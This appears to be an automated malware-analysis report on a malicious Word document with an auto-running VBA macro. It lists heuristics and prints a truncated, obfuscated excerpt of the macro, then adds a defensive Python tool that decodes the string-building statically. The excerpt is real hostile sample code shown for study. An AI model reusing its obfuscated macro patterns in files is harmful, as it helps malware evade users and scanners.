Verdict: MALICIOUS (Risk Score 142)
Malware Insights
MITRE ATT&CK: T1059 Command and Scripting Interpreter; T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The critical heuristic fired on a Shell() call within the VBA code, which indicates an attempt to execute an external command. The AutoOpen entry point means the macro runs as soon as the document is opened with macros enabled, which further supports malicious intent. The recovered macro source (macros.bas, 246240 bytes) is heavily obfuscated: string values are assembled at run time from Left(Right(...)) slices of decoy strings joined with Chr() calls, and the code is padded with arithmetic on undeclared variables that only survives because of On Error Resume Next. The argument passed to Shell() therefore cannot be read directly from the source; recovering it requires evaluating those string-building expressions or observing execution in a sandbox. Some fragments inside the decoy strings ('-jOin', 'vArIabLe', 'w-objec') resemble case-randomized PowerShell syntax, but nothing on this page confirms what is finally assembled. The legacy WordBasic auto-exec marker most plausibly reflects the same AutoOpen entry point seen by a second parser, since a VBA project was in fact recovered.
Heuristics (5)
- VBA macros detected (medium, 2 related findings), OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical), OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high), OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium), OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This particular URL is the standard OOXML DrawingML XML namespace identifier, present in virtually every Office file that contains drawing objects; it is not a network indicator and should not be added to a blocklist.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 246240 bytes | 79e2928499a91d91d50ae90eec60581a739815923e24b680f7d98a968545f3cb |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EzHGczd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hKmAEoQNTSI()
On Error Resume Next
prClFam = (GYZqVFnui - CDbl(178804) + nTEwHrsdKMJ + Fix(QZNoT / CLng(777485 * Sqr(lkEOU))) - 143648 / Sin(OQQbmlFlbBG - PtkLsbPaV - 466620 + CLng(Izchl)) * 415217 * Fix(178804))
PjUFm = "8Rowers9hgTqyUSGgOA7JA4U4hellGwSx . ((GENPcsDK7wq3DaR"
DiLdKGVMR = CStr(Left(Right(PjUFm, 52), 5)) + CStr(Left(Right(PjUFm, 29), 4)) + Left(Right(PjUFm, 21), 4) + Left(Right(PjUFm, 17), 4) + Left(Right(PjUFm, 44), 1)
dKHXqXJDVH = "szeEPqc*mdR*').nAMI4gQU[3SL74HzbD9b2WSi5vek-vArIabLe 'ESUsHwVUatd4ZD6jBk7C8,11,zHMnjRac"
uouZYd = Left(Right(dKHXqXJDVH, 44), 11) + CStr(Left(Right(dKHXqXJDVH, 80), 11)) + Left(Right(dKHXqXJDVH, 85), 1) + CStr(Left(Right(dKHXqXJDVH, 64), 2)) + CStr(Left(Right(dKHXqXJDVH, 12), 4))
UrwZYNjUI = "szIEPqce('. ( ([sTr4gQUAngL74HzbD9b2WSi5vekqgx2]-jOin'')( HwVUatd4ZD6jBk7C81feUz]ryIVacRv9XeA"
rHpJziYoDw = CStr(Left(Right(UrwZYNjUI, 47), 12)) + CStr(Left(Right(UrwZYNjUI, 85), 11)) + Left(Right(UrwZYNjUI, 91), 1) + Left(Right(UrwZYNjUI, 69), 2) + CStr(Left(Right(UrwZYNjUI, 13), 5))
IDZEjmS = "sE3ePreFBdRmNhliCqIerBOswSL74HzbD9e2WSi"
twrIhzw = Left(Right(IDZEjmS, 20), 5) + CStr(Left(Right(IDZEjmS, 36), 5)) + CStr(Left(Right(IDZEjmS, 38), 1)) + CStr(Left(Right(IDZEjmS, 29), 1)) + CStr(Left(Right(IDZEjmS, 5), 1))
zXwUiK = "3u[1,EP]ceBdgNCE)iCqI4gQUAw"
bRwicjbhbi = Left(Right(zXwUiK, 14), 4) + Left(Right(zXwUiK, 25), 3) + Left(Right(zXwUiK, 27), 1) + Left(Right(zXwUiK, 20), 1)
qDonbjvaE = Chr(43)
hHrUVjtLRG = "2b'HqEiz3EPq"
mpGHDTUQmHz = CStr(Left(Right(hHrUVjtLRG, 7), 2)) + CStr(Left(Right(hHrUVjtLRG, 11), 2))
iBXsYNcY = Chr(43)
DLiXtwTRSd = "sz3dPqceBdb) ((EibLD5nsawSL74Hasd9b2WSi5vekqgxAzKKpOzlESU'xEib-JOInEibEi7C81feUzHMnjRacRv9XeAmaR4qCbO = EibmdCmqOIe8h"
wKUIO = CStr(Left(Right(DLiXtwTRSd, 60), 15)) + Left(Right(DLiXtwTRSd, 107), 14) + Left(Right(DLiXtwTRSd, 114), 1) + Left(Right(DLiXtwTRSd, 87), 3) + Left(Right(DLiXtwTRSd, 16), 6)
JQZmW = Chr(43)
zjupfmwpO = (ANVako - CDbl(531570) + vBwoPR + Fix(HniutSuhO / CLng(835175 * Sqr(ZLzzw))) - 531351 / Sin(cjzvQ - CLdjZTjO - 477086 + CLng(iOKisEEvvRS)) * 259741 * Fix(531570))
XmztdvNHz = "iu(BEEPbceBdgEib&iCqI4gQUAw"
MMEoWT = Left(Right(XmztdvNHz, 14), 4) + Left(Right(XmztdvNHz, 25), 3) + Left(Right(XmztdvNHz, 27), 1) + Left(Right(XmztdvNHz, 20), 1)
hfShbH = Chr(43)
PwnXj = "iuhnBEPqbeBdgmEibgCqI4gQUAwSL7"
RDdKp = Left(Right(PwnXj, 16), 4) + Left(Right(PwnXj, 28), 4) + CStr(Left(Right(PwnXj, 30), 1)) + CStr(Left(Right(PwnXj, 22), 1))
JsiDj = Chr(43)
fVjKlsb = "bgEisz3EPqEibdgmNhliC"
zMHodaMoKu = CStr(Left(Right(fVjKlsb, 11), 3)) + Left(Right(fVjKlsb, 20), 3) + Left(Right(fVjKlsb, 21), 1)
jfoFuhDCZli = Chr(43)
qoTEqoowt = "2bhHqEiz3EPq"
TYaIbAU = CStr(Left(Right(qoTEqoowt, 7), 2)) + CStr(Left(Right(qoTEqoowt, 11), 2))
AIkWBaqpH = Chr(43)
nKjkFYd = "heBgsz3EPqBghdgmNhliC"
SqXGwiB = CStr(Left(Right(nKjkFYd, 11), 3)) + Left(Right(nKjkFYd, 20), 3) + Left(Right(nKjkFYd, 21), 1)
RDTrOuJTswM = (vHhlKHzB - CDbl(510856) + HKmZlpidA + Fix(LYjjrv / CLng(23314 * Sqr(MGzhWub))) - 134218 / Sin(IKDDfEvWLK - hRcEfprlBDM - 14632 + CLng(qpqvtECk)) * 289198 * Fix(510856))
awObFsYhzBF = Chr(43)
LwlaOlhwMAE = "b1FHEisz3"
cuInTw = Left(Right(LwlaOlhwMAE, 5), 2) + Left(Right(LwlaOlhwMAE, 9), 1)
XSwPUfm = Chr(43)
QWSdi = "sE3w-objedgmihliCqI4gQEibBgh4HzbD9b2WSi5bekqg"
GiWvEPZznSp = CStr(Left(Right(QWSdi, 23), 6)) + Left(Right(QWSdi, 42), 6) + CStr(Left(Right(QWSdi, 44), 1)) + Left(Right(QWSdi, 33), 1) + Left(Right(QWSdi, 5), 1)
wfIjXLMX = Chr(43)
IpdjbaUm = "hcBgsz3EPqEibdgmNhliC"
YjHTFLdbh = CStr(Left(Right(IpdjbaUm, 11), 3)) + Left(Right(IpdjbaUm, 20), 3) + Left(Right(IpdjbaUm, 21), 1)
vSzSDdGAwDz = Chr(43)
NPTdT = "'tBgsz3EPqBghdgmNhliC"
VdVWrKS = CStr(Left(Right(NPTdT, 11), 3)) + Left(Right(NPTdT, 20)
... (truncated)
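The string-slicing idiom in the preview above (Left(Right(decoy, n), m) fragments joined with + or & and Chr() calls) can be resolved statically without running the macro. The Python below is an added example for this report; it is not code from the analyzer, from oletools or from the sample. It never executes VBA: each assignment's right-hand side, which for this idiom happens to be valid Python syntax, is parsed with the ast module and walked with an allowlist of node types, so arithmetic decoy statements, unsupported functions and the truncated last line are simply skipped. It is run on a constructed sample with a known answer and on four statements copied verbatim from the preview. olevba's --deobf and --reveal options attempt the same class of rewriting over a whole file.

```python
# Static evaluator for the Left(Right(decoy, n), m) + Chr(n) string-building idiom seen in the
# carved macro. Added example for this report; not part of the analyzer, oletools or the sample.
# The VBA is never executed: each right-hand side is parsed with Python's ast module (this
# idiom happens to be valid Python syntax) and walked with an allowlist of node types.
import ast
import re

_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')   # name = expression
_STRING = re.compile(r'"((?:[^"]|"")*)"')                     # VBA literal, "" = embedded quote


def vba_left(s, n):   # VBA Left(): first n chars, all of s when n > len(s)
    return s[:max(n, 0)]


def vba_right(s, n):  # VBA Right(): last n chars, all of s when n > len(s), "" for n <= 0
    return s[-n:] if n > 0 else ""


# The only calls the evaluator will make. CStr on a string is the identity.
_FUNCS = {"left": vba_left, "right": vba_right, "chr": chr, "cstr": str}


def _translate(rhs):
    """Rewrite VBA string literals as Python ones: backslashes are literal in VBA."""
    return _STRING.sub(
        lambda m: '"' + m.group(1).replace("\\", "\\\\").replace('""', '\\"') + '"', rhs)


def _evaluate(node, env):
    """Walk the AST; anything outside the string-building subset raises ValueError."""
    if isinstance(node, ast.Expression):
        return _evaluate(node.body, env)
    if isinstance(node, ast.Constant) and isinstance(node.value, (str, int)):
        return node.value
    if isinstance(node, ast.Name):
        if node.id.lower() not in env:
            raise ValueError(f"unknown variable {node.id}")
        return env[node.id.lower()]
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.BitAnd)):  # + or &
        left, right = _evaluate(node.left, env), _evaluate(node.right, env)
        if not (isinstance(left, str) and isinstance(right, str)):
            raise ValueError("arithmetic, not concatenation")
        return left + right
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and not node.keywords:
        func = _FUNCS.get(node.func.id.lower())
        if func is None:
            raise ValueError(f"unsupported function {node.func.id}")
        return func(*(_evaluate(arg, env) for arg in node.args))
    raise ValueError(f"unsupported syntax {type(node).__name__}")


def evaluate_expression(rhs, env):
    """Evaluate one VBA string expression against earlier assignments (lower-cased names)."""
    try:
        return _evaluate(ast.parse(_translate(rhs), mode="eval"), env)
    except (SyntaxError, TypeError) as exc:  # VBA that is not Python syntax, truncation, bad args
        raise ValueError(str(exc)) from None


def recover_strings(vba_source):
    """Evaluate every parseable assignment top to bottom; return {name: value} for the
    assembled strings. Single-literal assignments feed the environment but are not reported."""
    env, recovered = {}, {}
    for line in vba_source.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.groups()
        try:
            value = evaluate_expression(rhs, env)
        except ValueError:
            continue                    # arithmetic decoys, unsupported functions, truncation
        if isinstance(value, str):      # ignore numeric assignments such as x = 5
            env[name.lower()] = value
            if not _STRING.fullmatch(rhs):
                recovered[name] = value
    return recovered


# Constructed sample (not from the report) with a known answer.
CONSTRUCTED_SAMPLE = r'''
junk = (aaa - CDbl(178804) + Fix(bbb / CLng(777485 * Sqr(ccc))))
decoy = "xxpowerxxshellxx"
word = Left(Right(decoy, 14), 5) + CStr(Left(Right(decoy, 7), 5))
plus = Chr(43)
cmd = word & plus + "extra"
'''

# Four statements copied verbatim from the macros.bas preview above.
REPORT_LINES = r'''PjUFm = "8Rowers9hgTqyUSGgOA7JA4U4hellGwSx . ((GENPcsDK7wq3DaR"
DiLdKGVMR = CStr(Left(Right(PjUFm, 52), 5)) + CStr(Left(Right(PjUFm, 29), 4)) + Left(Right(PjUFm, 21), 4) + Left(Right(PjUFm, 17), 4) + Left(Right(PjUFm, 44), 1)
dKHXqXJDVH = "szeEPqc*mdR*').nAMI4gQU[3SL74HzbD9b2WSi5vek-vArIabLe 'ESUsHwVUatd4ZD6jBk7C8,11,zHMnjRac"
uouZYd = Left(Right(dKHXqXJDVH, 44), 11) + CStr(Left(Right(dKHXqXJDVH, 80), 11)) + Left(Right(dKHXqXJDVH, 85), 1) + CStr(Left(Right(dKHXqXJDVH, 64), 2)) + CStr(Left(Right(dKHXqXJDVH, 12), 4))
'''

if __name__ == "__main__":
    print(recover_strings(CONSTRUCTED_SAMPLE), recover_strings(REPORT_LINES), sep="\n")
```

On the constructed sample the evaluator yields word = "powershell" and cmd = "powershell+extra" while skipping the arithmetic decoy. On the four report statements it reproduces the assembled values of DiLdKGVMR (18 characters) and uouZYd (29 characters, beginning with the case-randomized token "-vArIabLe '"). Because the preview is truncated and the remaining fragments are meaningless on their own, the full Shell() argument cannot be recovered from this page; run the same evaluator over the complete macros.bas and follow the variable that is eventually passed to Shell(). The evaluator deliberately refuses anything outside the string subset rather than falling back to eval(), so attacker-controlled macro text never reaches a Python interpreter.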